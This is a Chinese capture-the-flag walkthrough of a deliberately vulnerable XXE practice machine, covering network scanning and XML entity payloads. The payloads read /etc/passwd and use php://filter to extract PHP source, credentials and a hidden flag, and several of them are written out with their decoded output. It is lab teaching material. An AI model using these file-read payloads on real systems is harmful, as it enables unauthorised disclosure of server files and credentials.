目录
一、部署靶场
XXE靶场链接: https://pan.baidu.com/s/1xm5uVj5PlXfp7CmO6-KVow 提取码: ai8p
靶场虚拟机:网络设置为NAT模式
kali虚拟机:网络设置为NAT模式
保证靶场和kali在同一个网段。
二、信息收集
因为kali和靶场是在一个网段的,所以我们可以扫描网段内存活的主机
arp-scan -l
使用nmap工具对192.168.109.143这个ip进行扫描
nmap -A 192.168.109.143
可以扫描到80端口是开放的,使用的中间件是Apache,以及网站根目录下有哪些文件
查看robots.txt文件
![]()
之后我们访问xxe目录
可以针对这个页面进行xxe漏洞的测试
三、XXE漏洞测试
1)准备我们的bp抓包工具进行抓包
输入账号:admin,密码:123,进行抓包
2)构造payload
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE aa [ <!ENTITY bb SYSTEM "file:///etc/passwd"> ]> <root><name>&bb;</name><password>123</password></root>
发现可以访问到/etc/passwd文件
3)访问admin.php文件
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE aa [ <!ENTITY bb SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]> <root><name>&bb;</name><password>123</password></root>
PD9waHAKICAgc2Vzc2lvbl9zdGFydCgpOwo/PgoKCjxodG1sIGxhbmcgPSAiZW4iPgogICAKICAgPGhlYWQ+CiAgICAgIDx0aXRsZT5hZG1pbjwvdGl0bGU+CiAgICAgIDxsaW5rIGhyZWYgPSAiY3NzL2Jvb3RzdHJhcC5taW4uY3NzIiByZWwgPSAic3R5bGVzaGVldCI+CiAgICAgIAogICAgICA8c3R5bGU+CiAgICAgICAgIGJvZHkgewogICAgICAgICAgICBwYWRkaW5nLXRvcDogNDBweDsKICAgICAgICAgICAgcGFkZGluZy1ib3R0b206IDQwcHg7CiAgICAgICAgICAgIGJhY2tncm91bmQtY29sb3I6ICNBREFCQUI7CiAgICAgICAgIH0KICAgICAgICAgCiAgICAgICAgIC5mb3JtLXNpZ25pbiB7CiAgICAgICAgICAgIG1heC13aWR0aDogMzMwcHg7CiAgICAgICAgICAgIHBhZGRpbmc6IDE1cHg7CiAgICAgICAgICAgIG1hcmdpbjogMCBhdXRvOwogICAgICAgICAgICBjb2xvcjogIzAxNzU3MjsKICAgICAgICAgfQogICAgICAgICAKICAgICAgICAgLmZvcm0tc2lnbmluIC5mb3JtLXNpZ25pbi1oZWFkaW5nLAogICAgICAgICAuZm9ybS1zaWduaW4gLmNoZWNrYm94IHsKICAgICAgICAgICAgbWFyZ2luLWJvdHRvbTogMTBweDsKICAgICAgICAgfQogICAgICAgICAKICAgICAgICAgLmZvcm0tc2lnbmluIC5jaGVja2JveCB7CiAgICAgICAgICAgIGZvbnQtd2VpZ2h0OiBub3JtYWw7CiAgICAgICAgIH0KICAgICAgICAgCiAgICAgICAgIC5mb3JtLXNpZ25pbiAuZm9ybS1jb250cm9sIHsKICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgICAgICAgICBoZWlnaHQ6IGF1dG87CiAgICAgICAgICAgIC13ZWJraXQtYm94LXNpemluZzogYm9yZGVyLWJveDsKICAgICAgICAgICAgLW1vei1ib3gtc2l6aW5nOiBib3JkZXItYm94OwogICAgICAgICAgICBib3gtc2l6aW5nOiBib3JkZXItYm94OwogICAgICAgICAgICBwYWRkaW5nOiAxMHB4OwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAgICAgIH0KICAgICAgICAgCiAgICAgICAgIC5mb3JtLXNpZ25pbiAuZm9ybS1jb250cm9sOmZvY3VzIHsKICAgICAgICAgICAgei1pbmRleDogMjsKICAgICAgICAgfQogICAgICAgICAKICAgICAgICAgLmZvcm0tc2lnbmluIGlucHV0W3R5cGU9ImVtYWlsIl0gewogICAgICAgICAgICBtYXJnaW4tYm90dG9tOiAtMXB4OwogICAgICAgICAgICBib3JkZXItYm90dG9tLXJpZ2h0LXJhZGl1czogMDsKICAgICAgICAgICAgYm9yZGVyLWJvdHRvbS1sZWZ0LXJhZGl1czogMDsKICAgICAgICAgICAgYm9yZGVyLWNvbG9yOiMwMTc1NzI7CiAgICAgICAgIH0KICAgICAgICAgCiAgICAgICAgIC5mb3JtLXNpZ25pbiBpbnB1dFt0eXBlPSJwYXNzd29yZCJdIHsKICAgICAgICAgICAgbWFyZ2luLWJvdHRvbTogMTBweDsKICAgICAgICAgICAgYm9yZGVyLXRvcC1sZWZ0LXJhZGl1czogMDsKICAgICAgICAgICAgYm9yZGVyLXRvcC1yaWdodC1yYWRpdXM6IDA7CiAgICAgICAgICAgIGJvcmRlci1jb2xvcjojMDE3NTcyOwogICAgICAgICB9CiAgICAgICAgIAogICAgICAgICBoMnsKICAgICAgICAgICAgdGV4dC1hbGlnbjogY2VudGVyOwogICAgICAgICAgICBjb2xvcjogIzAxNzU3MjsKICAgICAgICAgfQogICAgICA8L3N0eWxlPgogICAgICAKICAgPC9oZWFkPgoJCiAgIDxib2R5PgogICAgICAKICAgICAgPGgyPkVudGVyIFVzZXJuYW1lIGFuZCBQYXNzd29yZDwvaDI+IAogICAgICA8ZGl2IGNsYXNzID0gImNvbnRhaW5lciBmb3JtLXNpZ25pbiI+CiAgICAgICAgIAogICAgICAgICA8P3BocAogICAgICAgICAgICAkbXNnID0gJyc7CiAgICAgICAgICAgIGlmIChpc3NldCgkX1BPU1RbJ2xvZ2luJ10pICYmICFlbXB0eSgkX1BPU1RbJ3VzZXJuYW1lJ10pIAogICAgICAgICAgICAgICAmJiAhZW1wdHkoJF9QT1NUWydwYXNzd29yZCddKSkgewoJCQkJCiAgICAgICAgICAgICAgIGlmICgkX1BPU1RbJ3VzZXJuYW1lJ10gPT0gJ2FkbWluaXN0aGViZXN0JyAmJiAKICAgICAgICAgICAgICAgICAgbWQ1KCRfUE9TVFsncGFzc3dvcmQnXSkgPT0gJ2U2ZTA2MTgzODg1NmJmNDdlMWRlNzMwNzE5ZmIyNjA5JykgewogICAgICAgICAgICAgICAgICAkX1NFU1NJT05bJ3ZhbGlkJ10gPSB0cnVlOwogICAgICAgICAgICAgICAgICAkX1NFU1NJT05bJ3RpbWVvdXQnXSA9IHRpbWUoKTsKICAgICAgICAgICAgICAgICAgJF9TRVNTSU9OWyd1c2VybmFtZSddID0gJ2FkbWluaXN0aGViZXN0JzsKICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICBlY2hvICJZb3UgaGF2ZSBlbnRlcmVkIHZhbGlkIHVzZSBuYW1lIGFuZCBwYXNzd29yZCA8YnIgLz4iOwoJCSRmbGFnID0gIkhlcmUgaXMgdGhlIDxhIHN0eWxlPSdjb2xvcjpGRjAwMDA7JyBocmVmPScvZmxhZ21lb3V0LnBocCc+RmxhZzwvYT4iOwoJCWVjaG8gJGZsYWc7CiAgICAgICAgICAgICAgIH1lbHNlIHsKICAgICAgICAgICAgICAgICAgJG1zZyA9ICdNYXliZSBMYXRlcic7CiAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgICA/PgogICAgICA8L2Rpdj4gPCEtLSBXMDB0L1cwMHQgLS0+CiAgICAgIAogICAgICA8ZGl2IGNsYXNzID0gImNvbnRhaW5lciI+CiAgICAgIAogICAgICAgICA8Zm9ybSBjbGFzcyA9ICJmb3JtLXNpZ25pbiIgcm9sZSA9ICJmb3JtIiAKICAgICAgICAgICAgYWN0aW9uID0gIjw/cGhwIGVjaG8gaHRtbHNwZWNpYWxjaGFycygkX1NFUlZFUlsnUEhQX1NFTEYnXSk7IAogICAgICAgICAgICA/PiIgbWV0aG9kID0gInBvc3QiPgogICAgICAgICAgICA8aDQgY2xhc3MgPSAiZm9ybS1zaWduaW4taGVhZGluZyI+PD9waHAgZWNobyAkbXNnOyA/PjwvaDQ+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlID0gInRleHQiIGNsYXNzID0gImZvcm0tY29udHJvbCIgCiAgICAgICAgICAgICAgIG5hbWUgPSAidXNlcm5hbWUiIAogICAgICAgICAgICAgICByZXF1aXJlZCBhdXRvZm9jdXM+PC9icj4KICAgICAgICAgICAgPGlucHV0IHR5cGUgPSAicGFzc3dvcmQiIGNsYXNzID0gImZvcm0tY29udHJvbCIKICAgICAgICAgICAgICAgbmFtZSA9ICJwYXNzd29yZCIgcmVxdWlyZWQ+CiAgICAgICAgICAgIDxidXR0b24gY2xhc3MgPSAiYnRuIGJ0bi1sZyBidG4tcHJpbWFyeSBidG4tYmxvY2siIHR5cGUgPSAic3VibWl0IiAKICAgICAgICAgICAgICAgbmFtZSA9ICJsb2dpbiI+TG9naW48L2J1dHRvbj4KICAgICAgICAgPC9mb3JtPgoJCQkKICAgICAgICAgQ2xpY2sgaGVyZSB0byBjbGVhbiA8YSBocmVmID0gImFkbWlubG9nLnBocCIgdGl0ZSA9ICJMb2dvdXQiPlNlc3Npb24uCiAgICAgICAgIAogICAgICA8L2Rpdj4gCiAgICAgIAogICA8L2JvZHk+CjwvaHRtbD4K
将得到的数据进行base64转码
<?php session_start(); ?> <html lang = "en"> <head> <title>admin</title> <link href = "css/bootstrap.min.css" rel = "stylesheet"> <style> body { padding-top: 40px; padding-bottom: 40px; background-color: #ADABAB; } .form-signin { max-width: 330px; padding: 15px; margin: 0 auto; color: #017572; } .form-signin .form-signin-heading, .form-signin .checkbox { margin-bottom: 10px; } .form-signin .checkbox { font-weight: normal; } .form-signin .form-control { position: relative; height: auto; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; padding: 10px; font-size: 16px; } .form-signin .form-control:focus { z-index: 2; } .form-signin input[type="email"] { margin-bottom: -1px; border-bottom-right-radius: 0; border-bottom-left-radius: 0; border-color:#017572; } .form-signin input[type="password"] { margin-bottom: 10px; border-top-left-radius: 0; border-top-right-radius: 0; border-color:#017572; } h2{ text-align: center; color: #017572; } </style> </head> <body> <h2>Enter Username and Password</h2> <div class = "container form-signin"> <?php $msg = ''; if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) { if ($_POST['username'] == 'administhebest' && md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') { $_SESSION['valid'] = true; $_SESSION['timeout'] = time(); $_SESSION['username'] = 'administhebest'; echo "You have entered valid use name and password <br />"; $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>"; echo $flag; }else { $msg = 'Maybe Later'; } } ?> </div> <!-- W00t/W00t --> <div class = "container"> <form class = "form-signin" role = "form" action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>" method = "post"> <h4 class = "form-signin-heading"><?php echo $msg; ?></h4> <input type = "text" class = "form-control" name = "username" required autofocus></br> <input type = "password" class = "form-control" name = "password" required> <button class = "btn btn-lg btn-primary btn-block" type = "submit" name = "login">Login</button> </form> Click here to clean <a href = "adminlog.php" tite = "Logout">Session. </div> </body> </html>
通过代码审计可以发现
密码做了一个md5加密,尝试对密码进行md5的解密
密码为admin@123
同时我们还可以发现flag存在于/flagmeout.php文件中
4)访问 flagmeout.php文件
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE aa [ <!ENTITY bb SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php"> ]> <root><name>&bb;</name><password>123</password></root>
PD9waHAKJGZsYWcgPSAiPCEtLSB0aGUgZmxhZyBpbiAoSlFaRk1NQ1pQRTRIS1dUTlBCVUZVNkpWTzVRVVFRSjUpIC0tPiI7CmVjaG8gJGZsYWc7Cj8+Cg==
base64解密后得到
<?php $flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->"; echo $flag; ?>
对JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5先进行base32解码在进行base64解码得到
/etc/.flag.php
5)访问/etc/.flag.php文件
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE aa [ <!ENTITY bb SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php"> ]> <root><name>&bb;</name><password>123</password></root>
JF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18uKyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMODPSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4IuJMODLiRfX18uJMOBLiTDgC4kw4EuJF9fXy4kw4EuJMOALiTDiC4kX19fLiTDgS4kw4AuJMODLiRfX18uJMOBLiTDgi4kw4MuJF9fXy4kw4EuJMOCLiTDgC4kX19fLiTDgS4kw4kuJMODLiRfX18uJMOBLiTDiS4kw4AuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOGLiTDgS4kX19fLiTDgS4kw4guJMODLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOJLiTDgS4kX19fLiTDgS4kw4kuJMOGLiciJyk7JF9fKCRfKTsK
对上述代码进行base64解码得到
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
我们可以尝试将代码部署到本地
6)部署本地php代码
7)访问本地代码,拿到flag
flag:SAFCSP{xxe_is_so_easy}